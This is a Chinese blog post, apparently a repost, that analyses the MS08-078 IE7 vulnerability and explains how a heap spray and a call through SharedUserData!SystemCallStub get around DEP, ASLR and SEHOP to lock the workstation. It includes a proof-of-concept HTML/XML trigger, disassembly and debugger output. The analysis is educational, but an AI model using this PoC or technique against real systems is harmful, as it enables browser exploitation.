How to Bypass DEP+ASLR+SEHOP

最新推荐文章于 2024-11-14 10:43:41 发布
转载 最新推荐文章于 2024-11-14 10:43:41 发布 · 613 阅读 · 0

本文通过分析MS08-078 IE7漏洞,详细解释了如何利用该漏洞绕过Windows系统的DEP、ASLR及SEHOP等安全保护机制,并以锁屏操作为例展示了攻击原理。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

昨天去SSCON2009听TK讲了一个议题"安全漏洞的下一个十年",佩服TK的演讲的幽默风趣,MS一个

非常具有忽悠的议题讲的很生动,精彩,再次膜拜下,我个人觉得里面最精彩部分就在如下了,呵呵,

通过MS08-078这个去年的IE7的漏洞来介绍如何绕过windows现有的安全保护机制,很是受启发,因为

TK只有一张PPT的介绍,我在此想展开介绍的更详细点,和大家分享一下TK的研究成果:),未经TK

的同意,在此还要感谢下TK:)

我去年分析过这个漏洞,现在让我们看看,到底是如果绕过windows现有的DEP,ALSR,SEHOP这些安全

保护机制的。

if(wxp||w2k3)document.write(
'<XML ID=I><X><C>
<![CDATA[<image SRC=http:// C8;ਊ.book.com src=http://www.google.com]]>
<![CDATA[>]]></C></X></xml>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<XML ID=I>
</XML>

漏洞细节就不介绍了,构造如此数据在这个Poc中

0x0a0a11c8

通过Heap spray在内存中填充0x7ffe027c这个值,为什么要填充如下值,下面会作介绍。


mshtml.dll CXfer::TransferFromSrc(void)
.text:461E3D18 public: long __thiscall CXfer::TransferFromSrc(void) proc near
.text:461E3D18 ; CODE XREF: CXfer::ColumnsChanged(ulong,ulong * const)+33 p
.text:461E3D18 ; CDataBindingEvents::TransferFromSrc(CElement *,long)+24 p ...
.text:461E3D18
.text:461E3D18 pvarg = VARIANTARG ptr -18h
.text:461E3D18 var_8 = dword ptr -8
.text:461E3D18 var_4 = dword ptr -4
.text:461E3D18
.text:461E3D18 mov edi, edi
.text:461E3D1A push ebp
.text:461E3D1B mov ebp, esp
.text:461E3D1D sub esp, 18h
.text:461E3D20 push ebx
.text:461E3D21 push esi
.text:461E3D22 mov esi, ecx
.text:461E3D24 xor ebx, ebx
.text:461E3D26 test byte ptr [esi+1Ch], 9
.text:461E3D2A jnz loc_461E3E2E

.text:461E3D30 mov eax, [esi] //eax==0x0a0a11c8
.text:461E3D32 cmp eax, ebx
.text:461E3D34 jz loc_461E3E29
.text:461E3D3A cmp [esi+4], ebx
.text:461E3D3D jz loc_461E3E29
.text:461E3D43 cmp [esi+8], ebx
.text:461E3D46 jz loc_461E3E29
.text:461E3D4C mov ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E push edi
.text:461E3D4F push eax //eax==0x0a0a11c8
.text:461E3D50 call dword ptr [ecx+84h] //call [0x7FFE027C+0x84], 换句话说就是call

[0x7ffe0300], 这是SharedUserData!SystemCallStub指针,这个指针里面存放着用户态进入内核态

ntdll!KiFastSystemCall函数的地址,也就是任何内核系统服务调用都会通过这个函数进入内核。

this call request for native API.// this call like call NtUserLockWorkStation for lock the windows:)


0:000> dd SharedUserData!SystemCallStub
7ffe0300 7c828608 7c82860c 00000000 00000000
7ffe0310 00000000 00000000 00000000 00000000
7ffe0320 00d2c763 00000000 00000000 00000000
7ffe0330 71724108 00000000 00000000 00000000
7ffe0340 00000000 00000000 00000000 00000000
7ffe0350 00000000 00000000 00000000 00000000
7ffe0360 00000000 00000000 00000000 00000000
7ffe0370 00000000 00000000 00000000 00000000

0:000> u 7c828608
ntdll!KiFastSystemCall:
7c828608 8bd4 mov edx,esp
7c82860a 0f34 sysenter
ntdll!KiFastSystemCallRet:


我们再看看这个0x11c8这个值构造的用意,先让我们看看锁屏函数NtUserLockWorkStation,也就是直接

调用这个函数就是会实现锁屏功能。

0:000> u 773ddd0d
USER32!NtUserLockWorkStation:
773ddd0d b8c8110000 mov eax,11C8h //
773ddd12 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300)
773ddd17 ff12 call dword ptr [edx]
773ddd19 c3 ret

我们再看看这个ie7的漏洞的片断
.text:461E3D46 jz loc_461E3E29
.text:461E3D4C mov ecx, [eax] //[0x0a0a11c8]==0x7ffe027c
.text:461E3D4E push edi
.text:461E3D4F push eax //eax==0x0a0a11c8//这里的实现是不是跟NtUserLockWorkStation很
相似
.text:461E3D50 call dword ptr [ecx+84h] //call [0x7FFE027C+0x84]

也许大家会问NtUserLockWorkStation的代码片断是mov eax,0x11c8,而上面的代码的eax是0x0a0a11c8,

事实在内核中处理过程,来通过传入的eax的值来判断是哪个服务调用,其实只用了低两个字节,所以

0x0a0a11c8可以忽略高两个字节,对服务调用结果不影响,所以完全可以当成是执行了锁屏操作。

结论:

1.通过Heap spray注入内存的构造的数据绕过DEP,因为没有在堆上执行代码

2.绕过ASLR,是因为内核服务调用的入口地址是不会变化的,只要能够构造相应的内核调用需要用到的

参数,就可以执行类似这样的shellcode,但是局限性也很明显了,因为这样构造出来的shellcode功能很

有限,就像TK演示的那样,制造了一个锁屏的操作。

3.利用起来非常困难,但就理论上就对抗windows的这些安全保护机制,算是绕过了,呵呵:)

写的匆忙,多多包涵,再次感谢TK提供的这种想法:)

[网络安全自学篇] 五十五.Windows系统安全之构建ROP链绕过DEP及原理详解
杨秀璋的专栏
03-03 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了基于SEH异常处理机制的栈溢出漏洞,利用一个恶意的请求头部(HEAD或GET)引起缓冲区溢出,从而改写SEH链的地址并反弹Shell。本文将讲解DEP堆栈执行保护机制,通过构造ROP链来绕过DEP保护,重点利用VirtualProtect,最终编写漏洞利用脚本并实现自动化攻击。基础性文章,希望对您有所帮助。
DEP bypass
samohyes的博客
09-26 418
Because I am using Ubuntu in English so I can't type chinese now. But here is a useful paper about bypassing DEP. I will put it here and polish this blog later.
MS08-067通用bypass DEP的缓冲区溢出栈帧构造方法的学习
瞎几把学
12-11 1521
<br />标 题: 【原创】MS08-067通用bypass DEP的缓冲区溢出栈帧构造方法的学习<br />作 者:parachaos<br />时 间: 2009-02-09,12:32:46<br />链 接: http://bbs.pediy.com/showthread.php?t=81667<br /><br />【题目】一种在windows xp sp2 chs 和windows xp sp3 chs 系统中通用的能够bypass DEP的利用MS08-067漏洞缓冲区溢出的栈帧构造方法的学
内核模式和用户模式的切换
内心的宁静带给我们力量。
01-22 3617
32位x86系统,每个进程的空间是4GB,即地址0x00000000到0xFFFFFFFF。 为了高效调用,Windows会把操作系统的内核数据和代码映射的系统中所有进程的进程空间中。因此4GB空间被划分为两个区域:用户空间和系统空间,默认大小为各2GB。 为了保护映射到进程空间的系统代码和数据,Windows提供了权限控制机制。也就是两种访问模式:用户模式和内核模式。 处理器在硬件一级保证
DEPASLR技术概览及应用
weixin_42605397的博客
11-14 959
本文还有配套的精品资源,点击获取 简介:DEP(数据执行防护)和ASLR(地址空间布局随机化)是提高计算机系统安全性的关键技术,能够有效防御恶意软件和缓冲区溢出攻击。DEP防止代码注入,而ASLR通过随机化内存布局增加攻击难度。这两种技术在现代操作系统中广泛应用,并通常与其它安全机制协同工作,以提供多层次的安全保护。 1. DEPASLR的简介与作用 在现...
安全漏洞--基于NDAY和0DAY漏洞免杀技巧
关注互联网安全的小虾米一枚
05-09 9045
一 漏洞简介 漏洞开发者在利用0day和Nday时,除了在逃过windos的自身安全机制的基础上,不可避免的要接触到与杀软对抗的工作,就一般情况来看,如果针对特定的目标杀软还是有很大可能可以绕过,难点是通用所有的杀软。 另外值得注意的一点,现今主流杀软很多,在通用的前提下,免杀工作往往占用很多时间。 二 构造POC 2.1 构造POC
漏洞类型及检测
m0_64973256的博客
01-07 1726
作者| 榴莲 编辑| 楌橪 I.通用漏洞类型 1.栈溢出 栈溢出是缓冲区溢出的一种,往往由于对缓冲区的长度没有判断,导致缓冲区的大小超过了预定的大小,导致在栈内的保存的返回地址被覆盖,这时候返回地址将指向未知的位置.造成访问异常的错误. 而当我们精心构造一段shellcode保存在某个位置,并且通过滑板指令以及其他特定的方法跳转至shellcode的位置上执行shellcode,此时就可以通过shellcode获取到系统的管理员权限.执行任意代码, windo...
DEPASLR的原理与破解
wangjiabin2007的专栏
07-10 6323
DEP原理就是在系统的内存页中设置了一个标志位,标示这个内存页的属性(可执行),硬件和系统级支持。 ASLR 原理同一个程序运行时,其相同模块的加载地址是随机的,不是固定在某个地址上。 DEP的绕过(破解)方法。
DEP/ASLR 原理及攻击
forevertingting的博客
08-10 4721
ASLR DEP
DEP/SEHOP/ASLR
cs74184235的博客
09-06 1054
 微软的安全开发生命周期(SDL)已经实施了十年了。这段时间里发生了很大的变化。在过去的十年中,互联网使用人口已经由约3亿5千万增长到超过24亿。现在,开发人员的机会比以往任何时候都要多。Windows 8仍然相对较新,云尚处于采用的早期阶段,而新型的移动设备和平台已经出现了迅猛发展。虽然互联网创造了许多处理业务的全新机会和方法,但是它也为网络犯罪创造了地下温床。安全漏洞所引发的财务问题
BypassDEP(数据执行保护)
weixin_45012273的博客
02-17 1120
介绍 DEP的主要作用是阻止数据页(默认的堆,栈以及内存池页)执行代码。用来弥补计算机对数据和代码混淆这一天然缺陷的。 DEP 的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入 shellcode 时, 程序会尝试在数据页面上执行指令,此时 CPU 就会抛出异常,而不是去执行恶意指令。 Vs设置DEP 在使用VS编译的时候也有DEP选项。(VS2019示例)默认情况下是开启的。 通过右键单击项目属性–>链接器–>高级–>DEP保护。 目标程序 //******
分析如何通过暴破方式bypass ASLR
热门推荐
softgmx的博客
08-30 1万+
名词说明: No-eXecutable bit (NX), address space layout randomization (ASLR) and stack smashing protector (SSP) 实现环境 本案例在我的centos 64位(内核版本3.1)同时bypass NX、ASLR、SSP保护 漏洞利用的分析过程 //通过暴力破解,拿到漏洞的偏移量、SSP的c...
DEP&栈保护&ASLR 开启关闭
zhuoyang111的博客
06-07 7234
判断ASLR是否打开,输出2表示打开 关闭ASLR,切换至root用户,输入命令 echo 0 > /proc/sys/kernel/randomize_va_space 开启ASLR,切换至root用户,输入命令 echo 2 > /proc/sys/kernel/randomize_va_space gcc编译时,关闭DEP和栈保护,-fno-st
基于SVM算法的人民币面值识别系统:从图像处理到机器学习模型的实现与应用 · 数字图像处理
08-11
基于支持向量机(SVM)的人民币面值识别系统的设计与实现。该系统利用MATLAB GUI工具,结合数字图像处理技术和机器学习模型,能够高效识别多种面值的人民币。主要步骤包括数据集准备、图像灰度化、边缘检测、旋转矫正、形态学操作、ROI截取、加载SVM模型、面值识别及结果验证。系统目前可识别1元至100元面值,正确率达到90%以上,并可通过扩展训练数据集来提升识别精度和覆盖更多面值。 适合人群:从事图像处理、机器学习研究的技术人员,以及对人民币面值识别感兴趣的开发者。 使用场景及目标:适用于银行、自助设备、零售终端等需要快速准确识别人民币面值的场合。目标是提供一种高效、准确、易用的人民币面值识别解决方案。 其他说明:该系统不仅展示了SVM在图像分类任务中的强大能力,还通过MATLAB GUI实现了操作流程的可视化,便于用户理解和使用。未来可以通过优化算法和增加训练样本进一步提升系统性能。
ctkqiang-WangZhongZhi-62936-1753627160067.zip
08-11
点sun小白ctkqiang_WangZhongZhi_62936_1753627160067.zip
LabVIEW调用基恩士XGX8500相机实现高效画面嵌入的开源方案 权威版
08-11
如何使用LabVIEW调用基恩士XGX8500相机实现画面嵌入的技术方案。首先,文中强调了准备工作的重要性,包括安装LabVIEW及其相关驱动和SDK,获取基恩士XGX8500相机的接口文档。接着,阐述了通过调用基恩士提供的API控制相机的具体步骤,如初始化相机、设置参数、开启预览流、获取画面数据等。然后,讲解了如何将获取的画面数据嵌入到LabVIEW的程序中,通过图形界面设计使相机画面合理显示。最后,指出该方案不仅能够节省昂贵的HX软件授权费用,还因其源程序和方法的开放性,为用户提供更多定制化的可能。 适合人群:从事工业自动化、机器视觉领域的工程师和技术人员。 使用场景及目标:适用于需要集成高质量图像采集设备的工业生产和检测系统,旨在提升自动化水平和视觉信息丰富度,降低软件授权成本。 其他说明:文中附有简单代码片段,帮助读者更好地理解和实践该方案。
PANDA 真空泵 WV 1200 A、WV 1800 A 和 WV 2400 A 使用说明书.pdf
最新发布
08-11
PANDA 真空泵 WV 1200 A、WV 1800 A 和 WV 2400 A 使用说明书.pdf
MAC should be bypass to support this feature.
01-21
### 绕过MAC地址限制实现特定功能支持 在探讨如何绕过MAC地址限制来实现特定功能之前,重要的是理解为何存在这样的需求以及可能的技术方案。 #### 使用虚拟网络接口卡(vNIC) 创建额外的虚拟网络接口卡是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值